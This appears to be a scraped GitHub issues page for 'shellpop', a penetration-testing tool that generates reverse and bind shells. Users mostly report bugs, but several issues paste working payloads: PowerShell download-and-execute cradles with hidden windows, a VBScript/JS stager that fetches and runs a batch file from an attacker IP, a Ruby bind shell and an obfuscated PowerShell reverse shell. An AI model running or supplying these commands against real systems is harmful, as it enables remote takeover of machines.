0x00-0x00 / shellpop Goto Github PK
View Code? Open in Web Editor NEWPop shells like a master.
License: MIT License
Pop shells like a master.
License: MIT License
Hello, Congratulations for the tool it is very good, I am with some doubts, I used a shell poweshell and the metasploit framework with handler, apparently appeared that I would get a meterpreter session, but simply got locked the terminal without opening the meterpreter session, my doubt and if it is possible to get the meterpreter session with the shellpop, something else I think would be interesting to put in the poweshell and -w hidden codes to make it hidden after running.
Tanks.
Here is another shell creator script with some additional ways.
ShellPop is incompatible with python3 due to inentation error in ./bin/shellpop.
$ python3 bin/shellpop
File "bin/shellpop", line 811
try:
^
TabError: inconsistent use of tabs and spaces in indentation
In python & other interpreted language projects, it is a good practice to provide a setup
routine, as an equivalent of the traditional make install
.
Therefore, the installation (here, setup.py
) should always be optional, and the user should be able to run the project as soon as it was cloned.
Most people like to test a tool before actually installing or packaging it into their system (this assertion is even more true for pentesters, who clone & test tools thousands of times per year)
After installing requirement, and installing setup still got error !
Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 4, in
import('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 765, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/lib/python3/dist-packages/pkg_resources/init.py", line 1545, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/EGG-INFO/scripts/shellpop", line 30, in
from shellpop import *
File "/usr/local/lib/python3.6/dist-packages/shellpop-0.3.5-py3.6.egg/shellpop/init.py", line 1, in
from bind import *
ModuleNotFoundError: No module named 'bind'
Powershell reverse-shell (number 22)
cmd used
--number 22 -H localhost -P 2323 --reverse --stager http
This will not work if the system is using proxy. taking cue from metasploit web delivery if we include
powershell.exe -nop -w hidden -c $d=new-object net.webclient;$d.proxy=[Net.WebRequest]::GetSystemWebProxy();$d.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $d.downloadstring('<URL>');
instead of the current
powershell.exe -nop -ep bypass -Command 'iex (new-object system.net.webclient).downloadString(\"http://localhost:80/sfLkhXIg\")'
Hi there! I'm excited to use this. Thank you so much for your contribution to the community and hard work!!
Just getting started and noticed that a module was missing from requirements.
Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 4, in <module>
__import__('pkg_resources').run_script('shellpop==0.3.5', 'shellpop')
File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 748, in run_script
self.require(requires)[0].run_script(script_name, ns)
File "/usr/local/lib/python2.7/dist-packages/pkg_resources/__init__.py", line 1517, in run_script
exec(code, namespace, namespace)
File "/usr/local/lib/python2.7/dist-packages/shellpop-0.3.5-py2.7.egg/EGG-INFO/scripts/shellpop", line 22, in <module>
import netifaces
ImportError: No module named netifaces
Hope this helps! Thanks again.
Hello, how can we hide all of the cmd windows that popup when executing the below cmd.exe command?
$ shellpop --reverse --number 21 --host 192.168.1.55 --handler --base64 --powershell-random-case --stager http --http-port 2226 --port 3336
[+] Choose a stager:
1. CertUtil Windows HTTP Stager
2. VBScript Windows HTTP Stager
[+] Stager number: 2
[+] Started HTTP server at port 2226
[+] Staged file has been named 'SkHEjSdH'
[+] Execute this code in remote target:
cmd.exe /c "echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://192.168.1.55:2226/SkHEjSdH", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("SkHEjSdH.bat");S = new ActiveXObject("Wscript.Shell");S.run("SkHEjSdH.bat");" > SkHEjSdH.js && cmd.exe /c "cscript SkHEjSdH.js"
As I was going though all the bind shells testing for an upcoming PR, I noticed that I could not get the linux/bind/tcp/ruby shell to work. Every time I ran it I got this error from sh:
ruby -rsocket -e 'f=TCPServer.new(1337);s=f.accept;exec sprintf("/bin/bash -i <&%d >&%d 2>&%d",s,s,s)'
sh: 1: 8: Bad file descriptor
From the looks of it, I'm guessing bash doesn't like f.accept
as a file descriptor, but not sure how to fix that. My ruby knowledge is very little.
I've run into an issue with powershell reverse shell payloads 9 and 25 if generated as described below. Tested it on Windows 7 x86 and Windows 10 x64. If fails on both. I'm no powershell guru so I'm not sure how to fix it.
This is the execution output:
powershell.exe -nop -ep bypass -Command "$xDHvvVTgtya='xx.xx.xx.xx';$GYhNfQRZIEYm=xxx;$lDUkaAa= New-Object System.Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG =$lDUkaAa.GetStream();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII).GetBytes('PS '+( Get-Location).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($ kcoITwLMzujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -n e 0){$HQjgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoIT wLMzujjdk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-Str ing)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Pat h+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvV Tgtya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($x DHvvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush() ;};$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();};"
And the error on Win7:
Unexpected token ')' in expression or statement. $xDHvvVTgtya='192.168.247.129';$GYhNfQRZIEYm=4444;$lDUkaAa=New-Object System. Net.Sockets.TCPClient($xDHvvVTgtya,$GYhNfQRZIEYm);$GcIjoaNgvqG=$lDUkaAa.GetStre am();[byte[]]$SJsnAdmfrbsJLjF=0..65535|:ASCII) <<<< .GetBytes('PS '+(Get-Locati on).Path+'> ');$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);while(($kcoITwLMz ujjdk=$GcIjoaNgvqG.Read($SJsnAdmfrbsJLjF,0,$SJsnAdmfrbsJLjF.Length)) -ne 0){$HQ jgMvUcOUSKh=([text.encoding]::ASCII).GetString($SJsnAdmfrbsJLjF,0,$kcoITwLMzujj dk);try{$KDUugHGsudblDb=(Invoke-Expression -c $HQjgMvUcOUSKh 2>&1|Out-String)}c atch{Write-Warning 'Something went wrong with execution of command on the targe t.';Write-Error $_;};$xDHvvVTgtya0=$KDUugHGsudblDb+'PS '+(Get-Location).Path+'> ';$xDHvvVTgtya1=($xDHvvVTgtya2[0]|Out-String);$xDHvvVTgtya2.clear();$xDHvvVTgt ya0=$xDHvvVTgtya0+$xDHvvVTgtya1;$cPLlmQj=([text.encoding]::ASCII).GetBytes($xDH vvVTgtya0);$GcIjoaNgvqG.Write($cPLlmQj,0,$cPLlmQj.Length);$GcIjoaNgvqG.Flush(); };$lDUkaAa.Close();if($xDHvvVTgtya3){$xDHvvVTgtya3.Stop();}; CategoryInfo : ParserError: ():String) [], ParentContainsErrorR ecordException FullyQualifiedErrorId : UnexpectedToken
Slightly different error, maybe more helpful, in Win10:
At line:1 char:196 ... KX=$XnBJSVNr.GetStream();[byte[]]$GQrahNYaUV=0..65535|:ASCII).GetByte ... ~ Unexpected token ')' in expression or statement. CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException FullyQualifiedErrorId : UnexpectedToken
Just my 2 cents:
The method number is the worst part of an awesome code. if instead of number user can input something recognizable like say language or extension like ps1 for powershell php aspx asp cmd etc that would be more useful and quick to remember and recall.
Thanks!
OS: Kali GNU/Linux Rolling
Python version: Python 2.7.15+
There seems to be a problem with the handler of reverse shell number 1.
The complete error is:
[+] Port Already used by another Program or Something Wrong... 2018 ./extras/c-ares-1.6.0/ares_gethostbyaddr.lo
Traceback (most recent call last):
File "/usr/local/bin/shellpop", line 858, in <module>
main()
File "/usr/local/bin/shellpop", line 840, in main
sys.exit()
NameError: global name 'sys' is not defined
The command I executed was:
$ shellpop --reverse --number 1 --handler --host xx.xx.xx.xx --port xxxx
It gave me an initial shell and after executing find
, I got this error and the shell closed.
I am available for any more info.
Thanks in advance
I've insalled ShellPop in a venv, in the latest kali. I'm using a python 2.7.18 venv.
After the installation of the requirements, I've got an import error :
bin/shellpop --list
Traceback (most recent call last):
File "bin/shellpop", line 18, in <module>
import pyperclip
ImportError: No module named pyperclip
However, pyperclip is correctly installed !
Any ideas of a solution ?
Thanks !
The arguments --powershell-x64 and --powershell-x86 arguments seem to prefix the wrong path to the payload. In fact, I believe they are reversed.
root@home:~# shellpop -H eth0 -P 1234 --powershell-x64 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe [...]
root@home:~# shellpop -H eth0 -P 1234 --powershell-x86 --reverse --number 9
[+] Execute this code in remote target:
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [...]
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.